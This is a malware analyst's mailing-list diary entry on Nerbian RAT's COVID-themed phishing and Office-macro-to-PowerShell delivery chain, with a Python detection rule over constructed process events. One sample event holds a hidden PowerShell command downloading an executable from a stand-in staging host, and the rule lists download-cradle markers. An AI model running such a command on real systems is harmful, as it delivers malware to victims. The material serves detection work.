[MART] - Daily Diary #508 - Meet Nerbian RAT

CTAS-MAT ctas-mat at appgate.com
Wed May 11 21:08:36 UTC 2022


Hello,

I hope everyone is doing well!

Below is the entry for today.

05/11/2022 - Diary entry #508:

Recently, a new RAT (Remote Access Trojan) named Nerbian RAT was discovered. Nerbian RAT is disseminated via spam with COVID-19 related subjects, impersonating the WHO (World Health Organization). The email carries a malicious Microsoft Word document as an attachment, sometimes compressed inside a RAR archive.

After the victim opens the document and enables the macro content, the macro executes a BAT file containing PowerShell code that downloads a malware dropper written in Go. The dropper is packed with UPX, a very common packer, and is responsible for checking the victim's location and environment. It then downloads Nerbian RAT, sets up persistence, and finally executes it.
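The delivery chain above (Office document, macro, BAT file, PowerShell download) is a process-tree pattern that endpoint telemetry can surface. The following is an added detection example, not code from the diary or from any Appgate tool: it runs over constructed Sysmon-style process-creation events (all pids, paths and the URL are made up) and flags a PowerShell process that carries a download marker on its command line and has an Office application among its ancestors, noting whether a BAT file sat in between.

```python
"""Flag Office -> (cmd.exe running a .bat) -> PowerShell download chains.

Added example for the Nerbian RAT delivery chain; the events below are
constructed sample telemetry, not data from the diary entry."""

from dataclasses import dataclass
from typing import Dict, List

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SHELLS = {"cmd.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# Substrings commonly seen in PowerShell download cradles (matched case-insensitively).
DOWNLOAD_MARKERS = (
    "downloadfile", "downloadstring", "invoke-webrequest", "iwr ",
    "net.webclient", "start-bitstransfer",
)


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str    # full path of the created process (Sysmon Event ID 1 "Image")
    cmdline: str  # its command line ("CommandLine")


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def ancestry(ev: ProcEvent, by_pid: Dict[int, ProcEvent], max_depth: int = 8) -> List[ProcEvent]:
    """Walk parent pids upward; returns [child, parent, grandparent, ...].

    Stops at unknown pids, at max_depth, or on a pid cycle (pids get reused)."""
    chain, seen, cur = [ev], {ev.pid}, ev
    while cur.ppid in by_pid and cur.ppid not in seen and len(chain) < max_depth:
        cur = by_pid[cur.ppid]
        seen.add(cur.pid)
        chain.append(cur)
    return chain


def find_office_download_chains(events: List[ProcEvent]) -> List[dict]:
    """Return one finding per PowerShell process that downloads and descends from Office."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for ev in events:
        if basename(ev.image) not in POWERSHELL:
            continue
        if not any(m in ev.cmdline.lower() for m in DOWNLOAD_MARKERS):
            continue
        chain = ancestry(ev, by_pid)
        names = [basename(c.image) for c in chain]
        if not any(n in OFFICE_APPS for n in names):
            continue  # downloads started from Explorer, a terminal, etc. are out of scope here
        via_bat = any(basename(c.image) in SHELLS and ".bat" in c.cmdline.lower() for c in chain)
        findings.append({
            "pid": ev.pid,
            "chain": " -> ".join(reversed(names)),  # root first, for readability
            "via_bat": via_bat,
            "cmdline": ev.cmdline,
        })
    return findings


# Constructed sample events: one malicious chain plus two benign look-alikes.
SAMPLE_EVENTS = [
    ProcEvent(100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
              r'"WINWORD.EXE" /n "C:\Users\victim\Downloads\WHO_Notice.doc"'),
    ProcEvent(300, 200, r"C:\Windows\System32\cmd.exe",
              r'cmd.exe /c "C:\Users\victim\AppData\Local\Temp\update.bat"'),
    ProcEvent(400, 300, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r'powershell.exe -w hidden -c "Invoke-WebRequest -Uri https://stage.example.invalid/u.exe '
              r'-OutFile $env:TEMP\u.exe"'),
    # Benign: a download launched from Explorer, no Office ancestor.
    ProcEvent(500, 100, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -c Invoke-WebRequest -Uri https://intranet.example.invalid/tool.zip"),
    # Benign: PowerShell under Word but with no download marker.
    ProcEvent(600, 200, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -c Get-Date"),
]

if __name__ == "__main__":
    for f in find_office_download_chains(SAMPLE_EVENTS):
        print(f"pid {f['pid']}: {f['chain']} (via .bat: {f['via_bat']})")
```

The walk is done from the PowerShell process upward rather than from Word downward so that the rule keeps working when the intermediate BAT or cmd.exe stage is swapped out; the `via_bat` field simply records whether the chain matched the variant the diary describes.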

The dropper also imports functionality from other Go projects to handle components such as Windows COM, the Win32 API and Windows WMI, as well as a Go library that is an anti-VM framework used by red teams and pentesters.

The final payload has features that are activated by its configuration encrypted in the binary itself. It has keylogging and screen-capture capabilities and communicates with its C2 over SSL. Nerbian RAT sends all the data encrypted, except the session key that is probably used as the campaign ID.

Nerbian RAT is not considered a modern or complex threat, but it shows how threat actors are using Go and third-party libraries to quickly weaponize their campaigns. Such threats can also easily be offered as malware-as-a-service to exfiltrate information and then deploy additional malware such as ransomware or a wiper.

Kind Regards,




Felipe Tarijon de Almeida
Malware Analyst
Appgate

E: felipe.tarijon at appgate.com

